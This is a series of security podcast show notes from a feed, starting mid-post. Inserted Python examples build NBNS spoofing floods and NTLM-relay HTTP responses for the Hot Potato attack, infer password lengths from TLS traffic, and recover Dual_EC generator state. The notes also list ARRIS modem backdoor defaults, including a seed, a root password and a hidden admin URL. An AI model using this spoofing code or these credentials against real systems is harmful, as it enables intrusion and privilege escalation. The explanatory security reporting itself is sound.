  • In the newest versions of Windows, it appears that Windows Update may no longer respect the proxy settings set in “Internet Options”, or check for WPAD. Instead proxy settings for Windows Update are controlled using “netsh winhttp proxy…”
  • Instead for these versions, we rely on a newer feature of Windows, the “automatic updater of untrusted certificates”
  • It’s unclear whether this attack would work when SMB signing is enabled. The exploit as released currently does not, but this may just be due to lack of SMB signing support in the CIFS library they’re using.
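Putting the three parts together, here is an added example written for these notes; it is not the Potato code or Project Zero’s PoC. It builds the NBNS query and response packets from Part One, models the resolver’s check to show that exactly one packet out of a full 65536-TXID flood is accepted, and returns the HTTP responses that Parts Two and Three rely on (the PAC file, the 302 bounce, the 401 NTLM challenge). The flag values, TTL, the PAC body pointing at 127.0.0.1:80 and the GETHASHES identifier format are assumptions for illustration; the actual NTLM-to-SMB relay and the UDP port exhaustion are left out.

```python
import os
import socket
import struct

# NetBIOS Name Service constants (RFC 1002). The response flag value is the
# usual "authoritative positive response" and is an assumption, not Potato's.
NB_TYPE, NB_CLASS = 0x0020, 0x0001
NBNS_QUERY_FLAGS = 0x0110        # recursion desired + broadcast
NBNS_RESPONSE_FLAGS = 0x8500     # response, authoritative, recursion desired
NBNS_NAME_LEN = 34               # length byte + 32 encoded chars + terminator


def encode_nb_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: pad to 15 bytes, append the service suffix, then
    write each nibble of every byte as a letter from 'A' (0x0) to 'P' (0xF)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(c for b in raw for c in (ord("A") + (b >> 4), ord("A") + (b & 0x0F)))
    return bytes([32]) + enc + b"\x00"


def decode_nb_name(wire: bytes) -> str:
    enc = wire[1:33]
    raw = bytes(((enc[i] - ord("A")) << 4) | (enc[i + 1] - ord("A")) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip()


def build_nbns_query(txid: int, name: str) -> bytes:
    """The broadcast query the victim resolver sends for `name`."""
    header = struct.pack(">HHHHHH", txid, NBNS_QUERY_FLAGS, 1, 0, 0, 0)
    return header + encode_nb_name(name) + struct.pack(">HH", NB_TYPE, NB_CLASS)


def build_nbns_response(txid: int, name: str, ip: str, ttl: int = 165) -> bytes:
    """Positive name query response claiming `name` lives at `ip`."""
    header = struct.pack(">HHHHHH", txid, NBNS_RESPONSE_FLAGS, 0, 1, 0, 0)
    rdata = struct.pack(">H", 0x0000) + socket.inet_aton(ip)   # NB_FLAGS (B-node, unique) + IPv4
    rr = encode_nb_name(name) + struct.pack(">HHIH", NB_TYPE, NB_CLASS, ttl, len(rdata)) + rdata
    return header + rr


def parse_nbns_response(pkt: bytes) -> dict:
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a name query response")
    name = decode_nb_name(pkt[12:12 + NBNS_NAME_LEN])
    ttl = struct.unpack(">I", pkt[50:54])[0]
    ip = socket.inet_ntoa(pkt[58:62])        # 2 bytes of NB_FLAGS precede the address
    return {"txid": txid, "name": name, "ip": ip, "ttl": ttl}


def resolver_accepts(query: bytes, response: bytes) -> bool:
    """Minimal model of the victim's check: TXID and name must match the
    outstanding query. The spoofer never sees the query, hence the flood."""
    q_txid = struct.unpack(">H", query[:2])[0]
    q_name = decode_nb_name(query[12:12 + NBNS_NAME_LEN])
    try:
        r = parse_nbns_response(response)
    except ValueError:
        return False
    return r["txid"] == q_txid and r["name"] == q_name


def spoof_flood(name: str, ip: str):
    """One response per possible 16-bit TXID (each would go to 127.0.0.1:137/udp)."""
    for txid in range(0x10000):
        yield build_nbns_response(txid, name, ip)


def count_accepted(name: str, ip: str, hidden_txid: int) -> int:
    """How many packets of a full flood the resolver accepts for one query."""
    query = build_nbns_query(hidden_txid, name)
    return sum(resolver_accepts(query, pkt) for pkt in spoof_flood(name, ip))


# Parts Two and Three: what the local HTTP listener answers. PAC contents,
# proxy port and the identifier format are assumptions for illustration.
PAC = 'function FindProxyForURL(url, host) { return "PROXY 127.0.0.1:80"; }'


def http_response(path: str, headers: dict) -> tuple:
    """Return (status, response headers, body). Serving the PAC makes the
    client proxy through us; every other URL is bounced to /GETHASHES<id>,
    which demands NTLM. The NTLM blobs would then be relayed to local SMB."""
    if path.lower() == "/wpad.dat":
        return 200, {"Content-Type": "application/x-ns-proxy-autoconfig"}, PAC
    if path.startswith("/GETHASHES"):
        if headers.get("Authorization", "").startswith("NTLM "):
            return 200, {}, ""           # type 1/3 message received: hand it to the SMB relay
        return 401, {"WWW-Authenticate": "NTLM"}, ""
    return 302, {"Location": "http://localhost/GETHASHES" + os.urandom(4).hex()}, ""
```

To run the flood for real you would send each packet from spoof_flood to 127.0.0.1:137 over UDP and serve http_response from a listener on port 80; the functions above are kept offline so the packet layout and the TXID check can be inspected directly.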

Feedback:


Round Up:


The post Hot Norse Potato | TechSNAP 252 first appeared on Jupiter Broadcasting.

Virtual Private Surveillance | TechSNAP 248 https://original.jupiterbroadcasting.net/92441/virtual-private-surveillance-techsnap-248/ Thu, 07 Jan 2016 19:18:51 +0000 https://original.jupiterbroadcasting.net/?p=92441 We break down the Bicycle attack against SSL, the story of Brian Krebs’s PayPal account getting hacked & the scoop on the Juniper Saga. Plus some great questions, our answers, a news breaking round up & much more! Thanks to: Get Paid to Write for DigitalOcean Direct Download: HD Video | Mobile Video | MP3 […]


We break down the Bicycle attack against SSL, the story of Brian Krebs’s PayPal account getting hacked & the scoop on the Juniper Saga.

Plus some great questions, our answers, a news breaking round up & much more!

Thanks to:


DigitalOcean


Ting


iXsystems

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Patreon

— Show Notes: —

The Bicycle Attack against SSL/TLS

  • Security researcher Guido Vranken has published a new attack against all versions of SSL/TLS
  • “While the sound configuration of both endpoints of a connection is understood to prevent the decoding from ciphertext to plaintext without having access to the private key(s), transactions conducted over a channel embedded in TLS leak various types of information.”
  • “A lot of research has been performed on how to stack up these different ‘knowns’ in order to meticulously reconstruct the user’s actions, given that the encrypted streams are known to an observer who is or has been listening in on the ‘secure’ transmission between two endpoints.”
  • “In this paper I will show that for a presumably large subset of web applications, it is easy to infer the length of parts of the plaintext, or certain attributes thereof, from a recorded stream of encrypted messages. Having access to the private key is not necessary. In fact, the actual ciphertexts embedded in the stream are irrelevant to the deduction, and entry-level arithmetic suffices.”
  • The attack can allow a passive listener to determine the length of your password, significantly reducing the effort required to brute force crack the password
  • The attack takes advantage of the known characteristics of HTTP transactions (although it could be used against other protocols), to determine the length of a specific field
  • In a regular HTTP form post, when a user is logging into a website, the post data consists of the form fields encoded as a string
  • Something like: username=allan&password=correcthorsebatterystaple&sub=Login
  • When the form is submitted over an encrypted connection (HTTPS), the text is not visible, however the length of the payload is known
  • If the length of the form field names, and the username are known, then the length of the password can be determined
  • So, this attack requires knowing the target’s username, although that is not a problem during a targeted attack
  • Most of the other information can be determined by the attacker by logging into an account on the site themselves
  • The attack requires knowing things like the target user’s browser user-agent string, but this can be determined by them visiting any unencrypted website.
  • The lengths of other headers, like user-agent and cookie, can be calculated by looking at requests to other known assets on the site, like an image or css file that is loaded by the login page
  • With all of this information, the length of the packet, less the lengths of the known fields, leaves you with the length of the target’s password
  • This significantly reduces the complexity of a brute force attack
  • If you know the password is exactly 12 characters long, you do not have to try every possible combination of 10, 11, 13, 14 etc character long passwords.
  • Because of the nature of this attack, it also works against previously recorded sessions, even from years ago
  • “It may also be executed on a larger scale on TOR exit nodes, VPN’s, proxies and other Internet traffic conduits in order to detect weak or short passwords susceptible to a brute-force or an attack based on a dictionary of often-used passwords”
  • The name “Bicycle Attack” was chosen because: if you wrap a bicycle in giftwrap, you can still tell it is a bicycle
  • The research then goes on to look at how this same concept can be applied to GPS coordinates, and IPv4 addresses. Just by knowing the length of the IP address, you can reduce the possible search space to only ~30% of the total. Some lengths cut the search space even more.
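As an added example (not from the paper or the show), the arithmetic above in code: it builds the login POST the way a browser would, computes the TLS 1.2 record length for an AEAD suite and for a CBC suite, then recovers every password length consistent with one observed record length. It also reproduces the IPv4 figure by counting how many of the 2^32 addresses print to each dotted-quad length. The header values (host, User-Agent, cookie) and the form field names are assumptions; the per-record overheads are those of AES-GCM (8-byte explicit nonce, 16-byte tag) and AES-CBC with HMAC-SHA1 (16-byte explicit IV, 20-byte MAC, padding to 16 bytes) in TLS 1.2.

```python
from urllib.parse import urlencode

TLS_HEADER = 5   # content type + version + length, always sent in the clear


def build_login_request(username: str, password: str, *, host: str = "example.com",
                        user_agent: str = "Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0",
                        cookie: str = "session=0123456789abcdef") -> bytes:
    """The plaintext HTTP request handed to TLS. Every field except the
    password is something the attacker can learn or measure elsewhere."""
    body = urlencode({"username": username, "password": password, "sub": "Login"})
    head = (f"POST /login HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\n"
            f"Cookie: {cookie}\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return (head + body).encode()


def tls_record_length(plaintext_len: int, suite: str) -> int:
    """Bytes on the wire for one TLS 1.2 record carrying `plaintext_len` bytes."""
    if suite == "AES128-GCM-SHA256":
        return TLS_HEADER + 8 + plaintext_len + 16        # explicit nonce + ciphertext + tag
    if suite == "AES128-SHA":                             # CBC, HMAC-SHA1, explicit IV
        padded = plaintext_len + 20 + 1                   # MAC + padding-length byte
        padded += (-padded) % 16                          # round up to the block boundary
        return TLS_HEADER + 16 + padded
    raise ValueError(f"unsupported suite {suite}")


def observe(username: str, password: str, suite: str, **known) -> int:
    """What a passive observer sees: only the record length of the login POST."""
    return tls_record_length(len(build_login_request(username, password, **known)), suite)


def infer_password_lengths(observed_len: int, suite: str, username: str,
                           max_len: int = 128, **known) -> list:
    """Candidate password lengths consistent with one observed record length.
    Rebuilding the request per candidate also accounts for the Content-Length
    digits growing with the body. Assumes the password needs no URL-encoding
    (an encoded byte costs three characters instead of one)."""
    return [n for n in range(max_len + 1)
            if observe(username, "x" * n, suite, **known) == observed_len]


def ipv4_length_distribution() -> dict:
    """Fraction of all 2^32 addresses whose dotted-quad text has each length.
    An octet prints as 1, 2 or 3 digits for 10, 90 and 156 of its 256 values."""
    per_octet = {1: 10, 2: 90, 3: 156}
    digits = {0: 1}
    for _ in range(4):                                    # convolve four octets
        nxt = {}
        for d, c in digits.items():
            for k, v in per_octet.items():
                nxt[d + k] = nxt.get(d + k, 0) + c * v
        digits = nxt
    return {d + 3: c / 2 ** 32 for d, c in digits.items()}   # plus three dots
```

With an AEAD suite the password length is pinned exactly; with CBC the padding only narrows it to a 16-byte window, which is the paper’s caveat about block ciphers. The IPv4 distribution peaks at 14 characters with about 31.8% of the space, matching the ~30% quoted above.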

  • #missioncomplete

  • https://forums.freenas.org/index.php?threads/freenas-logo-design-contest.39968/

Merry Christmas: We stole your paypal account

  • Alternative link, Krebs appears to be under a DDoS attack
  • Krebs’ PayPal account was compromised on Christmas Eve
  • “The perpetrator tried to further stir up trouble by sending my PayPal funds to a hacker gang tied to the jihadist militant group ISIS. Although the intruder failed to siphon any funds, the successful takeover of the account speaks volumes about why most organizations — including many financial institutions — remain woefully behind the times in authenticating their customers and staying ahead of identity thieves.”
  • “On Christmas Eve morning, I received an email from PayPal stating that an email address had been added to my account. I immediately logged into my account from a pristine computer, changed the password, switched my email address back to the primary contact address, and deleted the rogue email account.”
  • “I then called PayPal and asked how the perpetrator had gotten in, and was there anything else they could do to prevent this from happening again? The customer service person at PayPal said the attacker had simply logged in with my username and password, and that I had done everything I could in response to the attack. The representative assured me they would monitor the account for suspicious activity, and that I should rest easy.”
  • “Twenty minutes later I was outside exercising in the unseasonably warm weather when I stopped briefly to check email again: Sure enough, the very same rogue email address had been added back to my account. But by the time I got back home to a computer, my email address had been removed and my password had been changed. So much for PayPal’s supposed “monitoring;” the company couldn’t even spot the same fraudulent email address when it was added a second time.”
  • “In my second call to PayPal, I insisted on speaking with a supervisor. That person was able to tell me that, as I suspected, my (very long and complex) password was never really compromised. The attacker had merely called in to PayPal’s customer support, pretended to be me and was able to reset my password by providing nothing more than the last four digits of my Social Security number and the last four numbers of an old credit card account.”
  • “Let’s leave aside for a moment the reality that all of this static information about Brian Krebs has been posted online by various miscreants over the years (and probably remains online): Any company that authenticates customers with nothing more than static identifiers — address, SSN, DOB, phone number, credit card number, etc. — is vulnerable to these takeover attempts.”
  • “I asked the PayPal supervisor why the company couldn’t simply verify my identity by sending a text message to my phone, or a special signal to a PayPal mobile app? After all, PayPal has had the same mobile number of mine on file for years (the attacker also deleted that number from my profile as well). The supervisor explained that the company didn’t have any mobile authentication technologies, and that in order to regain access to the funds in my account I had to send the company a photocopied or scanned copy of my driver’s license.”
  • Not exactly something hard to fake, because I doubt they check it very carefully
  • “When I pressed the PayPal representative about whether he had any other ways to validate my identity short of sending a copy of my license, he offered to do so “using public records.” Now, I understand that what he actually meant was that PayPal would work with a major credit bureau to ask me a series of so-called “out of wallet” or “knowledge-based authentication” (KBA) questions — essentially yet more requests for static information that can be gleaned from a variety of sources online. But that didn’t stop me from playfully asking the representative why a security challenge should rely on answers from public records? He responded that someone probably would have to go down to a courthouse somewhere to do that, which made me laugh out loud and wish him a Merry Christmas.”
  • Krebs had a PayPal two-factor authentication token, but it apparently was not required to access the account
  • A user in the comments points out: “A dynamic identifier, such as a temporary code sent via SMS to a user’s mobile phone, isn’t any better if the provider of the mobile service is also vulnerable. I had my bank accounts emptied after Vodafone UK allowed someone to walk in off the street and transfer my phone number to a new Vodafone account in store. Hugely frustrating that they could ever allow this.”

The Juniper Saga

  • “On December 17, Juniper announced that some of their products were affected by “unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen® devices and to decrypt VPN connections”. That sounds like an attacker managed to subvert Juniper’s source code repository and insert a backdoor.”
  • “Juniper followed up with a slightly more detailed post that noted that there were two backdoors: one via SSH and one that “may allow a knowledgeable attacker who can monitor VPN traffic to decrypt that traffic”. Either of these would be very interesting to a nation-state attacker but that latter—passive decryption of VPN connections—is really in their neighborhood.”
  • “Dual-EC was an NSA effort to introduce a backdoored pseudo-random number generator (PRNG) that, given knowledge of a secret key, allowed an attacker to observe output from the RNG and then predict its future output. If an attacker can predict the output of the PRNG then they can know the keys that one or both sides of a VPN connection will choose and decrypt it. (For more details, see the research paper.)”
  • “During the CRYPTO 2007 rump session, Niels Ferguson and Dan Shumow demonstrated that if the points are not randomly generated, but carefully chosen in advance, the security of Dual_EC DRBG can be subverted by the party doing the choosing; effectively backdooring the PRNG. Namely if one chooses P, Q such that Q=P*e holds for a value e that is kept secret, it will allow the party that generated said P, Q to recover the internal state of the PRNG from observed output in a computationally “cheap fashion” – hence instances of Dual_EC PRNG for which the provenance of the points P and Q is unknown are susceptible to having been backdoored.”
  • “It stands to reason that whoever managed to slip in their own Q will also know the corresponding e such that P*e=Q (the value P was unchanged from the standard) and hence is able to recover the internal state of the backdoored Dual_EC generator from the output generator. What is unknown however is what an attack would look like for the PRNG cascade employed by Juniper’s ScreenOS.”
  • In the past, Juniper put out a KB article explaining their use of Dual_EC:
  • “ScreenOS does make use of the Dual_EC_DRBG standard, but is designed to not use Dual_EC_DRBG as its primary random number generator. ScreenOS uses it in a way that should not be vulnerable to the possible issue that has been brought to light. Instead of using the NIST recommended curve points it uses self-generated basis points and then takes the output as an input to FIPS/ANSI X.9.31 PRNG, which is the random number generator used in ScreenOS cryptographic operations.”
  • “However, apparently starting in August 2012 (release date according to release notes for 6.3.0r12), Juniper started shipping ScreenOS firmware images with a different point Q. Adam Caucill first noted this difference after HD Moore posted a diff of strings found in the SSG 500 6.2.0r14 and the 6.2.0r15 firmware. As we can deduce from their recent security advisory and the fact that they reverted back to the old value Q in the patched images, this was a change not authored by them. Apparently Juniper only realised this recently and not when they were issuing KB28205.”
  • “Static analysis indicates that the output of the Dual_EC generator indeed is not used directly, but rather only to reseed an ANSI X9.31 PRNG. Besides the unused EC PRNG known-answer test function, a function we call reseed_system_prng is the only one that references the ec_prng_generate_output function”
  • “Update: Shortly after reading my post, Willem Pinckaers pointed out that the reseed_system_prng function sets the global variable system_prng_bufpos to 32. This means that after the first invocation of this function, the for loop right after the reseed call in system_prng_gen_block never executes. Hence, the ANSI X9.31 PRNG code is completely non-functional.”
  • “if it wasn’t the NSA who did this, we have a case where a US government backdoor effort (Dual-EC) laid the groundwork for someone else to attack US interests. Certainly this attack would be a lot easier given the presence of a backdoor-friendly RNG already in place. And I’ve not even discussed the SSH backdoor which, as Wired notes, could have been the work of a different group entirely. That backdoor certainly isn’t NOBUS—Fox-IT claim to have found the backdoor password in six hours”
  • “NOBUS” is an intelligence community term for “nobody but us”
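The Dual_EC trapdoor described above, as an added worked example that is not part of the original post or of any of the cited research: a toy curve over a small prime, a generator that follows the Dual_EC_DRBG structure (state s becomes x(sP), output is x(sQ) with the top bits dropped), and the state recovery an attacker who knows the relation between P and Q can perform. The curve parameters, the 3-bit truncation and the seed are assumptions chosen so it runs instantly; the real generator works on P-256 and drops 16 of 256 bits, which only changes the size of the brute-force loop.

```python
from math import gcd

# Toy curve y^2 = x^3 + A*x + B over GF(p). All three values are assumptions
# picked so the demo runs instantly; p is prime and p % 4 == 3.
p, A, B = 10007, 2, 3
FIELD_BITS = p.bit_length()          # 14
TRUNC_BITS = 3                       # real Dual_EC drops 16 of 256 bits
OUT_MASK = (1 << (FIELD_BITS - TRUNC_BITS)) - 1


def ec_add(P1, P2):
    """Affine point addition; None is the point at infinity."""
    if P1 is None:
        return P2
    if P2 is None:
        return P1
    (x1, y1), (x2, y2) = P1, P2
    if x1 == x2 and (y1 + y2) % p == 0:
        return None
    if P1 == P2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def ec_mul(k, pt):
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def xcoord(pt):
    return 0 if pt is None else pt[0]    # infinity is a toy-curve artifact only


def sqrt_mod(a):
    """Square root mod p for p % 4 == 3, or None if `a` is a non-residue."""
    a %= p
    if a == 0:
        return 0
    if pow(a, (p - 1) // 2, p) != 1:
        return None
    return pow(a, (p + 1) // 4, p)


def lift_x(x):
    """A point (x, y) on the curve, or None if no such point exists."""
    y = sqrt_mod(x ** 3 + A * x + B)
    return None if y is None else (x, y)


def point_order(pt):
    n, acc = 1, pt
    while acc is not None:
        acc, n = ec_add(acc, pt), n + 1
    return n


def pick_base_point():
    for x in range(1, p):
        pt = lift_x(x)
        if pt is not None and pt[1] != 0 and point_order(pt) > 100:   # avoid tiny subgroups
            return pt


def dual_ec_step(s, P, Q):
    """One Dual_EC_DRBG output: new state s' = x(sP), output = x(s'Q) truncated."""
    s_next = xcoord(ec_mul(s, P))
    return s_next, xcoord(ec_mul(s_next, Q)) & OUT_MASK


def recover_state(out1, out2, P, Q, d):
    """Attacker holding d with P = d*Q: for each way to fill in the dropped
    bits of out1, lift x to a point R (= s1*Q up to sign), compute
    x(d*R) = x(s1*P) = s2, and keep the s2 values that also explain out2."""
    found = set()
    for hi in range(1 << TRUNC_BITS):
        x = (hi << (FIELD_BITS - TRUNC_BITS)) | out1
        R = lift_x(x) if x < p else None
        if R is None:
            continue
        s2 = xcoord(ec_mul(d, R))                         # the generator's next state
        if xcoord(ec_mul(s2, Q)) & OUT_MASK == out2:      # must match the next output
            found.add(s2)
    return found


# Standard-style setup: P is fixed, whoever picks Q sets Q = e*P and keeps e.
P = pick_base_point()
n = point_order(P)
e = next(k for k in range(5, n) if gcd(k, n) == 1)
Q = ec_mul(e, P)
d = pow(e, -1, n)                    # P = d*Q: the trapdoor the Q-chooser holds


def demo(seed=1234):
    """Return (true state after two outputs, attacker's candidates,
    the third output, the outputs the candidates predict for it)."""
    s1, out1 = dual_ec_step(seed, P, Q)
    s2, out2 = dual_ec_step(s1, P, Q)
    _s3, out3 = dual_ec_step(s2, P, Q)
    cands = recover_state(out1, out2, P, Q, d)
    return s2, cands, out3, {dual_ec_step(c, P, Q)[1] for c in cands}
```

Two outputs suffice here because only 8 high-bit fillings exist; on P-256 the same loop runs 65536 times per output and, as the cited paper notes, around 30 bytes of raw output is enough. Whether Juniper’s change to Q was exploitable in ScreenOS hinges on the cascade point quoted above: with the X9.31 stage non-functional, the Dual_EC output reaches the IKE nonces directly.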

Feedback:

https://twitter.com/JohnLaTwC/status/682350922710659073


https://twitter.com/JohnLaTwC/status/682352201927294976


Round Up:


The post Virtual Private Surveillance | TechSNAP 248 first appeared on Jupiter Broadcasting.

Terrorgram | Unfilter 170 https://original.jupiterbroadcasting.net/91606/terrorgram-unfilter-170/ Thu, 17 Dec 2015 01:16:50 +0000 https://original.jupiterbroadcasting.net/?p=91606 The US Government’s war on encryption is going from cold to hot. The stage has been set for a rough 2016 for US companies that employ encryption in their products. We’ll break down the major talking points for backdoors, intercepted communications & the general need to invade your privacy. Plus the United States massive concessions […]


The US Government’s war on encryption is going from cold to hot. The stage has been set for a rough 2016 for US companies that employ encryption in their products. We’ll break down the major talking points for backdoors, intercepted communications & the general need to invade your privacy.

Plus the United States’ massive concessions in Syria you’re not being told about, big news for drones & a little bit of good news in Unfilter’s last episode of 2015!


Show Notes:

— Episode Links —

The post Terrorgram | Unfilter 170 first appeared on Jupiter Broadcasting.

Guarding Turkey’s Oil | Unfilter 168 https://original.jupiterbroadcasting.net/90991/guarding-turkeys-oil-unfilter-168/ Wed, 02 Dec 2015 20:50:07 +0000 https://original.jupiterbroadcasting.net/?p=90991 It’s been a busy week, and there’s a lot of important news that’s been buried under a lot of junk news. Your Unfilter show is a healthy serving of news that really matters, like the real reason Turkey shot down a Russian Jet & why the Obama administration had their intelligence reports altered. It’s not […]


It’s been a busy week, and there’s a lot of important news that’s been buried under a lot of junk news. Your Unfilter show is a healthy serving of news that really matters, like the real reason Turkey shot down a Russian Jet & why the Obama administration had their intelligence reports altered. It’s not what you’re being told.

Plus the latest crazy reasons to ban encryption, some breaking news & more!


Show Notes:

— Episode Links —

The post Guarding Turkey's Oil | Unfilter 168 first appeared on Jupiter Broadcasting.

Double ROT-13 | TechSNAP 241 https://original.jupiterbroadcasting.net/90526/double-rot-13-techsnap-241/ Thu, 19 Nov 2015 16:45:11 +0000 https://original.jupiterbroadcasting.net/?p=90526 Encryption & privacy took quite a beating this week in the wake of the Paris attacks. We come to its defense. Your ISP heard you like backdoors, so they put a backdoor in your backdoor, the story of the social RAT & more! Thanks to: Get Paid to Write for DigitalOcean Direct Download: HD Video […]


Encryption & privacy took quite a beating this week in the wake of the Paris attacks. We come to its defense. Your ISP heard you like backdoors, so they put a backdoor in your backdoor, the story of the social RAT & more!


— Show Notes: —

The Paris Attacks Were An Intelligence Community Failure, Not An ‘Encryption’ Problem

  • Less than two months ago, Techdirt noted that, having lost the immediate battle for US legislation to backdoor encryption, those in the intelligence community knew they just needed to bide their time until the next big terrorist attack.
  • Here was the quote from Robert Litt — the top lawyer for the Office of the Director of National Intelligence from September:

“the legislative environment is very hostile today,” the intelligence community’s top lawyer, Robert S. Litt, said to colleagues in an August e-mail, which was obtained by The Post, “it could turn in the event of a terrorist attack or criminal event where strong encryption can be shown to have hindered law enforcement.”


Backdoor in cable modem, contains backdoor

  • Security researcher Bernardo Rodrigues was invited to give a talk at a security conference, and he decided to research the topic of Cable Modem security
  • Unlike talks from years ago, this wasn’t about how to get free cable internet, but instead about “the security of the cable modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything’s really really bad.”
  • “While researching on the subject, I found a previously undisclosed backdoor on ARRIS cable modems, affecting many of their devices including TG862A, TG862G, DG860A. As of this writing, Shodan searches indicate that the backdoor affects over 600,000 externally accessible hosts and the vendor did not state whether it’s going to fix it yet.”
  • “ARRIS SOHO-grade cable modems contain an undocumented library (libarris_password.so) that acts as a backdoor, allowing privileged logins using a custom password”
  • “ARRIS password of the day is a remote backdoor known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backdoor password. The default seed is MPSJKMDHAI and guess what – many ISPs won’t bother changing it at all.”
  • “The backdoor account can be used to enable Telnet and SSH remotely via the hidden HTTP Administrative interface “https://192.168.100.1/cgi-bin/tech_support_cgi” or via custom SNMP MIBs”
  • “The default password for the SSH user ‘root’ is ‘arris’. When you access the telnet session or authenticate over SSH, the system spawns the ‘mini_cli’ shell asking for the backdoor password”
  • “Yes, they put a backdoor in the backdoor (Joel from Dlink is sure to be envious). The undocumented backdoor password is based on the last five digits from the modem’s serial number. You get a full busybox shell when you log on the Telnet/SSH session using these passwords.”
  • The researcher’s marketing solution for the vulnerability? An old-fashioned keygen, complete with chiptunes and ASCII art
  • The vulnerability was disclosed to CERT on 2015-09-13, and CERT has a 45-day disclosure policy. The vendor has yet to correct the issue
  • Ohh, and it seems there are more backdoors

The Story of the Social RAT-in-the-Browser

  • A Remote Access Trojan (RAT) is malware that runs on your computer, giving unlimited access to a cybercriminal who can then steal information or install other malicious software.
  • They are able to operate under the radar of traditional security measures because a RAT’s installation mechanism is usually attached to a legitimate program, allowing an intruder to do just about anything on the targeted computer including, access confidential information, such as credit card and social security numbers, activate a system’s video or webcam, distribute malware, or alter files.
  • RATs have been used by countries and hacktivists for many years, however recently, we’ve seen this remote access attack vector migrate to online banking fraud.
  • These specific RATs, termed RAT-in-the-Browser (RitB), give cybercriminals access to banking credentials and account information.
  • One of the reasons these Trojans have spread so rapidly is because banks often use traditional security measures such as device fingerprinting to validate a device’s reputation, assigning ‘risk’ to new or untrustworthy devices and assigning ‘trust’ to known user devices.
  • RitB sessions are, therefore, often successful since these detection tools won’t find anything unusual.
  • A Social RitB adds another layer of complexity: fraudsters are beginning to use social engineering to carry out remote access attacks. All a fraudster needs to do is convince a user to install a standard remote support tool on their computer — for example, Ammyy, UltraVNC, AeroAdmin, or RemotePC — and use it to perpetrate online banking fraud.
  • This type of banking fraud is simple for cybercriminals to carry out since it doesn’t require the technical knowhow needed to develop malware and is easy to infect users through various exploitation mechanisms.
  • Here’s how it works: a fraudster calls a user and convinces him or her that he or she is an employee of a reputable organization (i.e. an Internet service provider or bank), explains to the user that there is a security issue on his computer and then fools the user into downloading and installing a remote support tool (or gives the fraudster access to an existing tool already installed). The fraudster then convinces the user to login to his or her bank account for a quick ‘security check.’ And voilà, the attacker is in and can submit a fraudulent transaction. This is a relatively easy process for the criminal that requires far less technical know-how and monetary expenditure than a regular RitB attack.

Feedback:


Round-Up:


The post Double ROT-13 | TechSNAP 241 first appeared on Jupiter Broadcasting.

Speculated Apples | TTT 210 https://original.jupiterbroadcasting.net/87351/speculated-apples-ttt-210/ Tue, 08 Sep 2015 12:08:06 +0000 https://original.jupiterbroadcasting.net/?p=87351 A new touchscreen display goes on sale for the Raspberry Pi that nearly makes it a complete computer, researchers hack the sensors of self driving cars & we speculate rampantly about the iPad Pro, but definitely not the iPhone 6s! Direct Download: MP3 Audio | OGG Audio | Video | HD Video | Torrent | […]


A new touchscreen display goes on sale for the Raspberry Pi that nearly makes it a complete computer, researchers hack the sensors of self-driving cars & we speculate rampantly about the iPad Pro, but definitely not the iPhone 6s!


Show Notes:

— Episode Links —

The post Speculated Apples | TTT 210 first appeared on Jupiter Broadcasting.

Insecurity by Design | LINUX Unplugged 108 https://original.jupiterbroadcasting.net/87166/insecurity-by-design-lup-108/ Tue, 01 Sep 2015 16:28:54 +0000 https://original.jupiterbroadcasting.net/?p=87166 Top law enforcement officials in the US want backdoors in all encryption systems. What would the ramifications to open source around the world be if this became law of the land in the US? Details on the upcoming road show, Kubuntu’s new look, saying goodbye to an old friend & some Go powered retro feedback. […]


Top law enforcement officials in the US want backdoors in all encryption systems. What would the ramifications to open source around the world be if this became law of the land in the US?

Details on the upcoming road show, Kubuntu’s new look, saying goodbye to an old friend & some Go powered retro feedback.


Show Notes:

Pre-Show:

Catch Up:



Using gotty to expose my BBS to the web!

I was delighted to see that you guys covered gotty in the last episode of LAS. I just recently (about a week ago) started experimenting with gotty as a bridge between my telnet/SSH BBS and the web, and it’s been a pretty sweet experience so far. The author was very responsive on his GitHub page in walking me through a handful of issues I was having in getting the font setup correctly (since my board makes heavy use of textmode artwork). Check it out!

Go is an open source programming language that makes it easy to build simple, reliable, and efficient software.

How does OSS Respond to State Backdoor Requirements?

NSA Boss: Encrypted Software Needs Government Backdoors

He remains adamant that technology companies should install government-friendly backdoors in encrypted products.

DigitalOcean

New name for the road show…

Chris mentioned he was looking for a silly name for the new mobile studio in his RV. Here you go, “The whole enchilada show”. OK, perhaps not that good, other ideas….

zircon_34

JB Road Show Essentials Wishlist

A list of important items we need for our road trip, thanks for the help, this lets us focus on big ticket mechanical and installation items!

Linux Academy

LILO to finish development of LILO at 12/2015

Any keystroke launcher diehards here? : LinuxActionShow

01org/thermal_daemon · GitHub

Runs Linux from the people:

  • Send in a pic/video of your runs Linux.
  • Please upload videos to YouTube and submit a link via email or the subreddit.

Support Jupiter Broadcasting on Patreon

